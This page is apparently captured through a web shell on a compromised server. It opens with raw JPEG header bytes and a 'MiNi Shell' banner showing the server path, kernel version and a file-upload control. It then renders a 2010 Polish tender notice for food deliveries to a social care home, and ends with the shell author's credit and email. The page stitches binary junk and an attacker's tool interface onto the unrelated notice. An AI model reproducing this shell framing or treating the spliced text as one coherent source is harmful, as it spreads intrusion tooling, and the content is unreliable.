JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100618/173890-N-2010.html

<p class="kh_header"><b>Strzelce Opolskie: Sukcesywna dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Strzelcach Op. z filią w Szymiszowie i filią w Leśnicy ul. Strażacka 8- dostawa do filii Szymiszów ul. Strzelecka 2</b><br>
<b>Numer ogłoszenia: 173890 - 2010; data zamieszczenia: 18.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Strzelcach Opolskich z Filią w Szymiszowie i Filią w Leśnicy , ul. Strażacka 8, 47-100 Strzelce Opolskie, woj. opolskie, tel. 077 4613480, faks 077 4613480.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.strzelceopolskie.cyb.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Strzelcach Op. z filią w Szymiszowie i filią w Leśnicy ul. Strażacka 8- dostawa do filii Szymiszów ul. Strzelecka 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest  sukcesywna dostawa artykułów spożywczych  dla  Domu  Pomocy  Społecznej w  Strzelcach  Op. z  filią  w Szymiszowie i  filią  w  Leśnicy  ul. Strażacka 8 - dostawa do filii Szymiszów  ul Strzelecka 2   w  ilościach:                                                                                                                                                                                                                 
Część  I  załącznik  nr  2:  chrzan  tarty  słoik  180g  - 60szt,  cukier  1kg,  - 2300kg,  cukier  puder  500g - 40szt,  cukier  waniliowy  32g,  - 130szt,  cynamon  20g-  60szt, czekolada mleczna 100g -50 szt, czosnek granulowany 20g - 600szt, dżem słoik 280g różne smaki niskosłodzony np. Łowicz lub inny o podobnej konsystencji i smaku- 1400szt.,fasola Jaś 400g-200 szt., fasola Jaś 5kg - 30 szt., fasolka czerwona konserwowa puszka 400g -60 szt.,
groch łuskany połówki 400g - 180szt., groszek konserwowy puszka 400g - 60szt., herbata ekspresowa czarna 50szt. w paczce np. Lipton lub inna o podobnych właściwościach smakowych - 50 paczek, herbata granulowana 80g - 400 paczek, herbata granulowana czarna 90 g - 400 paczek,  herbata granulowana czarna 100g - 800 paczek, herbata miętowa ekspresowa 50 szt. w paczce- 120 paczek, herbata owocowa ekspresowa 50 szt. w  paczce- 120 szt, kakao 100g - 50szt., kakao 200g -50szt., kasza gryczana 5 kg - 60kg, kasza gryczana w woreczkach 4x100g = 400g - 80 szt., kasza jęczmienna 1 kg - 150kg, kasza manna 500g - 400szt., kawa naturalna rozpuszczalna 200g - 10szt.,kawa naturalna rozpuszczalna 100g - 10szt, kawa naturalna 250g - 10szt., kawa zbożowa rozpuszczalna 150g np. Inka lub inna nie gorsza jakościowo - 50szt, kminek 20g - 30szt., kukurydza w puszkach 400g   - 60 szt., kwasek cytrynowy 20g - 420szt., liść laurowy 10g - 50 szt., majeranek 20g -200szt., majonez 225g słoik np. Winiary lub inny nie gorszy jakościowo i smakowo- 60 szt., majonez  250g słoik  np. Winiary  lub  inny  nie  gorszy  jakościowo i  smakowo  - 60szt,  marmolada słoik 280g - 20szt., mąka pszenna 1 kg typ 500 np. wrocławska lub inna o podobnych parametrach - 1200kg., mąka ziemniaczana 1 kg - 150kg, miód naturalny słoik 220g- 30 szt., musztarda 200g - 200szt., musztarda 900g - 60 szt., ocet spirytusowy 10% 1 l butelka -120szt., olej spożywczy 1l butelka plastikowa - 660 szt., orzech włoski połówki 100g - 20 szt,  papryka słodka mielona 20g - 50 szt., pasztet drobiowy 110 g w foremkach np. Herby lub inny nie gorszy jakościowo - 400 szt, pasztet drobiowy 130 g w foremkach np. Herby lub inny nie gorszy jakościowo - 400 szt  pasztet drobiowy 160 g w puszkach np. Herby lub inny nie gorszy jakościowo - 400 szt , pasztet drobiowy 200 g słoik np. Herby lub inny nie gorszy jakościowo - 400 szt , pieprz czarny mielony - 50g - 250 szt., płatki owsiane błyskawiczne 400g - 400 szt., proszek do pieczenia 36g - 60 szt., przecier pomidorowy 30% 800g-100 szt., przecier pomidorowy 30% 200g np. Pudliszki lub inny nie gorszy jakościowo - 200 szt., przyprawa do pierników  20g - 50 szt., przyprawa do flaków 20g - 120 szt., rodzynki 100g - 10 szt.,  rodzynki 200g - 10 szt., ryż 1kg - 360 kg, seler konserwowy słoik 320g - 60szt., soda oczyszczona 40g - 30 szt., sok owocowy 0,33l różne smaki np. Kubuś lub inny nie gorszy jakościowo -1900 szt., sok owocowy 1l-  butelka czarna porzeczka - 20 szt.,  sok owocowy 1l - butelka malina - 30 szt.,  sok owocowy 1l- butelka truskawka - 20 szt., sok owocowy gęsty 420g butelka - 60 szt., sól spożywcza jodowana 1 kg - 300 kg, suchary bezcukrowe 285g - 150 szt, suchary z cukrem 290g - 150 szt, szynka konserwowa mielona 110g foremka jednorazowa- 500 szt, szynka konserwowa mielona 130 g foremka jednorazowa - 500 szt., wiórki kokosowe 100g - 60 szt., woda mineralna niegazowana  1,5 l - 450 szt,  ziele angielskie 15g - 60szt.,żelatyna spożywcza 50g - 240 szt. 

Część II załącznik  nr 3 : barszcz biały  - 38kg, barszcz czerwony  - 50kg, budyń czekoladowy - 15kg,  budyń śmietankowy  - 15kg,  budyń waniliowy  - 15kg,  bulion o smaku wędzonki - 15kg,  deser  tiramisu  - 10kg,  fix  do  gulaszu  -  10kg,  fix  do  mięsa  mielonego  - 7kg,  galaretka  brzoskwiniowa  -  10kg,  galaretka  cytrynowa  - 10kg,  galaretka  pomarańczowa  -  10kg,  galaretka  truskawkowa  -  10kg,  galaretka  wiśniowa  -  10kg,  kisiel  brzoskwiniowy  - 10kg,  kisiel  pomarańczowy  -  10kg,  kisiel  truskawkowy  -  10kg,  kisiel  wiśniowy  -  10kg,  koper  suszony   -  6kg,  koperkowy  sos  sałatkowy - 6kg,  natka  pietruszki  suszona - 2kg,  panierka  -  10kg,  powidła  śliwkowo-jabłkowe  -  10kg,  przyprawa  w  płynie  typu  maggi  - 60l, przyprawa  warzywna -  150kg,  puree  ziemniaczane  -  100kg,  rosół  drobiowy  -  24kg,  rosół  wołowy  - 24kg,  rosół  jarzynowy  -  10kg,  sos  Bolognese  -  12kg,  sos  grzybowy  -  12kg,  sos  myśliwski  -  13kg, sos pieczeniowy - 10kg, sos  pieczarkowy  -  12kg,  sos  pieprzowy  - 12kg,  sos  słodko-kwaśny  -  10kg,  szczypiorek  suszony  - 2kg,  włoski  sos  sałatkowy  -  6kg,  zasmażka  ciemna  -  4kg,  zioła  prowansalskie  suszone  -  5kg,  zupa  brokułowa  -30kg,  zupa  cebulowa  -20kg,  zupa  grzybowa  -  20kg,  zupa  gulaszowa  -  20kg,  zupa  jarzynowa  -  20kg,  zupa kalafiorowa  -  20kg,  zupa  pieczarkowa  kremowa  -  40kg,  zupa  porowa  - 20kg,  zupa  szparagowa  -  30kg,  żurek  -  40kg.

Część  III  załącznik  nr  4:  makaron  jajeczny  nitki  - 200kg,  makaron  jajeczny  świderki,  kolanka,  łazanki  - 400kg..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>przewiduje się zwiększenie ilości asortymentu do 20% zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.00.00-0, 03.21.22.00-2, 15.86.00.00-4, 15.87.00.00-7, 15.40.00.00-2, 15.82.11.50-5, 15.13.00.00-8, 15.85.11.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie spełniania warunków j.w. odbywać się będzie poprzez badanie treści dokumentów załączonych w treści oferty oraz innych koniecznych czynności zmierzających do zbadania poprawności i wiarygodności złożonej oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie spełniania warunków j.w. odbywać się będzie poprzez badanie treści dokumentów załączonych w treści oferty oraz innych koniecznych czynności zmierzających do zbadania poprawności i wiarygodności złożonej oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie spełniania warunków j.w. odbywać się będzie poprzez badanie treści dokumentów załączonych w treści oferty oraz innych koniecznych czynności zmierzających do zbadania poprawności i wiarygodności złożonej oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie spełniania warunków j.w. odbywać się będzie poprzez badanie treści dokumentów załączonych w treści oferty oraz innych koniecznych czynności zmierzających do zbadania poprawności i wiarygodności złożonej oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie spełniania warunków j.w. odbywać się będzie poprzez badanie treści dokumentów załączonych w treści oferty oraz innych koniecznych czynności zmierzających do zbadania poprawności i wiarygodności złożonej oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>druk oferty załacznik nr 1, formularz cenowy załącznik nr 2, formularz cenowy zalącznik nr 3, formularz cenowy zalącznik nr 4,wzór umowy załacznik nr 5</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się zwiększenie ilości asortymentu do 20% wartości umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.strzelceopolskie.cyb.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Strzelcach Opolskich ul. Strazacka 8 budynek główny IIIp. dział administracji i obsługi..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2010 godzina 09:50, miejsce: Siedziba zamawiającego w Strzelcach Op. ul. Strażacka 8, budynek DPS, dział administracji i obsługi, III piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Załącznik nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3. Opis  przedmiotu  zamówienia;
Przedmiotem  zamówienia  jest  sukcesywna dostawa artykułów spożywczych  dla  Domu  Pomocy  Społecznej w  Strzelcach  Op. z  filią  w Szymiszowie i  filią  w  Leśnicy ul. Strażacka 8 - dostawa do filii Szymiszów  ul. Strzelecka 2  w  ilościach:                                                                                                                                                                                                                 
Część  I  załącznik  nr  2:  chrzan  tarty  słoik  180g  - 60szt,  cukier  1kg,  - 2300kg,  cukier  puder  500g - 40szt,  cukier  waniliowy  32g,  - 130szt,  cynamon  20g-  60szt, czekolada mleczna 100g -50 szt, czosnek granulowany 20g - 600szt, dżem słoik 280g różne smaki niskosłodzony np. Łowicz lub inny o podobnej konsystencji i smaku- 1400szt.,fasola Jaś 400g-200 szt., fasola Jaś 5kg - 30 szt., fasolka czerwona konserwowa puszka 400g -60 szt.,
groch łuskany połówki 400g - 180szt., groszek konserwowy puszka 400g - 60szt., herbata ekspresowa czarna 50szt. w paczce np. Lipton lub inna o podobnych właściwościach smakowych - 50 paczek, herbata granulowana 80g - 400 paczek, herbata granulowana czarna 90 g - 400 paczek,  herbata granulowana czarna 100g - 800 paczek, herbata miętowa ekspresowa 50 szt. w paczce- 120 paczek, herbata owocowa ekspresowa 50 szt. w  paczce- 120 szt, kakao 100g - 50szt., kakao 200g -50szt., kasza gryczana 5 kg - 60kg, kasza gryczana w woreczkach 4x100g = 400g - 80 szt., kasza jęczmienna 1 kg - 150kg, kasza manna 500g - 400szt., kawa naturalna rozpuszczalna 200g - 10szt.,kawa naturalna rozpuszczalna 100g - 10szt, kawa naturalna 250g - 10szt., kawa zbożowa rozpuszczalna 150g np. Inka lub inna nie gorsza jakościowo - 50szt, kminek 20g - 30szt., kukurydza w puszkach 400g   - 60 szt., kwasek cytrynowy 20g - 420szt., liść laurowy 10g - 50 szt., majeranek 20g -200szt., majonez 225g słoik np. Winiary lub inny nie gorszy jakościowo i smakowo- 60 szt., majonez  250g słoik  np. Winiary  lub  inny  nie  gorszy  jakościowo i  smakowo  - 60szt,  marmolada słoik 280g - 20szt., mąka pszenna 1 kg typ 500 np. wrocławska lub inna o podobnych parametrach - 1200kg., mąka ziemniaczana 1 kg - 150kg, miód naturalny słoik 220g- 30 szt., musztarda 200g - 200szt., musztarda 900g - 60 szt., ocet spirytusowy 10% 1 l butelka -120szt., olej spożywczy 1l butelka plastikowa - 660 szt., orzech włoski połówki 100g - 20 szt,  papryka słodka mielona 20g - 50 szt., pasztet drobiowy 110 g w foremkach np. Herby lub inny nie gorszy jakościowo - 400 szt, pasztet drobiowy 130 g w foremkach np. Herby lub inny nie gorszy jakościowo - 400 szt  pasztet drobiowy 160 g w puszkach np. Herby lub inny nie gorszy jakościowo - 400 szt , pasztet drobiowy 200 g słoik np. Herby lub inny nie gorszy jakościowo - 400 szt , pieprz czarny mielony - 50g - 250 szt., płatki owsiane błyskawiczne 400g - 400 szt., proszek do pieczenia 36g - 60 szt., przecier pomidorowy 30% 800g-100 szt., przecier pomidorowy 30% 200g np. Pudliszki lub inny nie gorszy jakościowo - 200 szt., przyprawa do pierników  20g - 50 szt., przyprawa do flaków 20g - 120 szt., rodzynki 100g - 10 szt.,  rodzynki 200g - 10 szt., ryż 1kg - 360 kg, seler konserwowy słoik 320g - 60szt., soda oczyszczona 40g - 30 szt., sok owocowy 0,33l różne smaki np. Kubuś lub inny nie gorszy jakościowo -1900 szt., sok owocowy 1l-  butelka czarna porzeczka - 20 szt.,  sok owocowy 1l - butelka malina - 30 szt.,  sok owocowy 1l- butelka truskawka - 20 szt., sok owocowy gęsty 420g butelka - 60 szt., sól spożywcza jodowana 1 kg - 300 kg, suchary bezcukrowe 285g - 150 szt, suchary z cukrem 290g - 150 szt, szynka konserwowa mielona 110g foremka jednorazowa- 500 szt, szynka konserwowa mielona 130 g foremka jednorazowa - 500 szt., wiórki kokosowe 100g - 60 szt., woda mineralna niegazowana  1,5 l - 450 szt,  ziele angielskie 15g - 60szt.,żelatyna spożywcza 50g - 240 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.00.00-0, 03.21.22.00-2, 15.86.00.00-4, 15.40.00.00-2, 15.82.11.50-5, 15.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Załącznik nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest  sukcesywna dostawa artykułów spożywczych  dla  Domu  Pomocy  Społecznej w  Strzelcach  Op. z  filią  w Szymiszowie i  filią  w  Leśnicy  ul. Strażacka 8 - dostawa do filii Szymiszów  ul.  Strzelecka 2   w  ilościach:                                                                                                                     Część II załącznik  nr 3 : barszcz biały  - 38kg, barszcz czerwony  - 50kg, budyń czekoladowy - 15kg,  budyń śmietankowy  - 15kg,  budyń waniliowy  - 15kg,  bulion o smaku wędzonki - 15kg,  deser  tiramisu  - 10kg,  fix  do  gulaszu  -  10kg,  fix  do  mięsa  mielonego  - 7kg,  galaretka  brzoskwiniowa  -  10kg,  galaretka  cytrynowa  - 10kg,  galaretka  pomarańczowa  -  10kg,  galaretka  truskawkowa  -  10kg,  galaretka  wiśniowa  -  10kg,  kisiel  brzoskwiniowy  - 10kg,  kisiel  pomarańczowy  -  10kg,  kisiel  truskawkowy  -  10kg,  kisiel  wiśniowy  -  10kg,  koper  suszony   -  6kg,  koperkowy  sos  sałatkowy - 6kg,  natka  pietruszki  suszona - 2kg,  panierka  -  10kg,  powidła  śliwkowo-jabłkowe  -  10kg,  przyprawa  w  płynie  typu  maggi  - 60l, przyprawa  warzywna -  150kg,  puree  ziemniaczane  -  100kg,  rosół  drobiowy  -  24kg,  rosół  wołowy  - 24kg,  rosół  jarzynowy  -  10kg,  sos  Bolognese  -  12kg,  sos  grzybowy  -  12kg,  sos  myśliwski  -  13kg, sos pieczeniowy - 10kg, sos  pieczarkowy  -  12kg,  sos  pieprzowy  - 12kg,  sos  słodko-kwaśny  -  10kg,  szczypiorek  suszony  - 2kg,  włoski  sos  sałatkowy  -  6kg,  zasmażka  ciemna  -  4kg,  zioła  prowansalskie  suszone  -  5kg,  zupa  brokułowa  -30kg,  zupa  cebulowa  -20kg,  zupa  grzybowa  -  20kg,  zupa  gulaszowa  -  20kg,  zupa  jarzynowa  -  20kg,  zupa kalafiorowa  -  20kg,  zupa  pieczarkowa  kremowa  -  40kg,  zupa  porowa  - 20kg,  zupa  szparagowa  -  30kg,  żurek  -  40kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Załacznik nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest  sukcesywna dostawa artykułów spożywczych  dla  Domu  Pomocy  Społecznej w  Strzelcach  Op. z  filią  w Szymiszowie i  filią  w  Leśnicy  ul. Strażacka 8 - dostawa do filii Szymiszów  ul.  Strzelecka 2   w  ilościach:              Część  III  załącznik  nr  4:  makaron  jajeczny  nitki  - 200kg,  makaron  jajeczny  świderki,  kolanka,  łazanki  - 400kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com